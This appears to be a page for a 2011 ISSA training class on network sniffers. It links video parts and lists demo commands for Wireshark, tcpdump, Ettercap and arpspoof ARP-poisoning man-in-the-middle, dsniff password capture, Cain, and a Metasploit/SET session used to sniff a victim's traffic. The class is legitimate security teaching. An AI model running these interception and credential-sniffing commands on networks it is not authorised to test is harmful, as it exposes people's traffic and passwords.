Network Sniffers Class for the Kentuckiana ISSA 2011

This time Gary Hampton joins me to impart his knowledge of using Wireshark to diagnose problems on wireless networks. I cover the usual suspects:  TCPDump, Metasploit sniffing with Meterpreter, ARP Poisoning, Ettercap, Cain, NetworkMinor, Firesheep and Xplico. I lost part of Gary's on screen demo when my recording rig froze up, and I apparently did not make a proper sacrifice to the demo gods for my section when I tried to show off Ettercap filters, but I hope you still find it informative.


Part 1: Intro to Sniffers


Sniffers Class Part 1 from Adrian Crenshaw on Vimeo.

Download: http://www.archive.org/download/IssaSniffersClass/sniffers1.avi

Part 2: Wireshark and Wireless with Gary Hampton

Sniffers Class Part 2 from Adrian Crenshaw on Vimeo.


Download: http://www.archive.org/download/IssaSniffersClass/sniffers2.avi

Part 3: A little more Wireshark, TCPDump, Metasploit sniffing with Meterpreter, ARP Poisoning, Ettercap, Cain, NetworkMinor, Firesheep, Xplico and bridging.


Sniffers Class Part 3 from Adrian Crenshaw on Vimeo.

Commands used:
Wireshark Demo
 
1.       Run Wireshark
2.       Basic start capture
3.       Start capture with options
4.       Drill down OSI
5.       Capture filter options (4.9 in book)
not tcp port 3389
not broadcast and not multicast
6.       Show a packet
7.       Pop a packet out
8.       Sort by columns
9.       Follow stream (web traffic)
10.    Export HTTP Objects
11.    Simple view filters
tcp.port == 80
!(ip.addr == 192.168.1.13)
12.    Filter builder
13.    Apply filters from different panes (packet vs. details panes).
14.    Save filters
15.     Open a Wiki page
16.    Edit-> Find packet
17.    Analyzers ->Expert Info
18.    Analyzers ->Firewall ACLs
19.    Stats
20.    Color rules
21.    Save capture
22.    Mention Lua
Dumpcap/TCPDump
    dumpcap –D
    dumpcap -i eth0 -s 0 -f "port 80" -w webtraffic.pcap
Sniffing in Monitor mode
   ifconfig wlan0 down
   iwconfig wlan0 mode monitor
   iwconfig wlan0 channel 1
   ifconfig wlan0 up
Ettercap Demo
1.      ettercap -T –q –i eth0 -M ARP // //
2.      ettercap -T –q –i eth0 -M ARP // /10.1.1.1/
3.      Show ARP traffic
4.      Telnet to 10.1.1.1
5.      http to 10.1.1.1
6.      FTP/Telnet/HTTP someplace with a password
7.      Show find sniffers
ettercap –G
ettercap –T –I eth0 –P list
ettercap –T –I eth0 –P search_promisc  //
8.      Filters:
     etterfilter ig.filter -o ig.ef
     ettercap -T -q -F ig.ef -M ARP // //
9.      Mention MITM: icmp, dhcp, port filters
10.    driftnet -i eth0
11.    Etherape
Cain Demo
1.      Start poisoning
2.      Telnet to 10.1.1.1
3.      http to 10.1.1.1
4.      FTP/Telnet/HTTP someplace with a password
5.      SSL someplace from VM
6.      Sniff RDP
ARPSpoof Demo
   cat /proc/sys/net/ipv4/ip_forward
   echo 1 > /proc/sys/net/ipv4/ip_forward
   arpspoof -i eth0 10.0.0.1
   arpspoof -i eth0 -t 10.0.0.113 10.0.0.1
   dsniff –I eth0 -c
NetworkMiner
1.      TCP fingerprinting
2.      Host details
3.      DHCP finger printing
4.      File capture
5.      Passwords
6.      Plaintext
7.      Open pcap
Bridging in Linux setup
    sudo apt-get install bridge-utils   
Script to setup MAC bridging:
    ifconfig eth0 0.0.0.0
    ifconfig eth1 0.0.0.0
    brctl addbr mybridge
    brctl addif mybridge eth0
    brctl addif mybridge eth1
    ifconfig mybridge up
Things to show while bridged
    ifconfig
    sudo tcpdump -i mybridge -s 0 -w out.cap
    sudo etherape -i mybridge
    sudo driftnet -i mybridge
Metasploit/SET
   Backtrack->Penetration->SET
   Menu Choices 2, 1, 2 (Google.com), 2, 2, default, no
   <go to page>
   sessions -i 1
   use sniffer
   help
   sniffer_interfaces
   sniffer_start 2
   sniffer_dump 2 /tmp/all.cap
   <Show in Wireshark>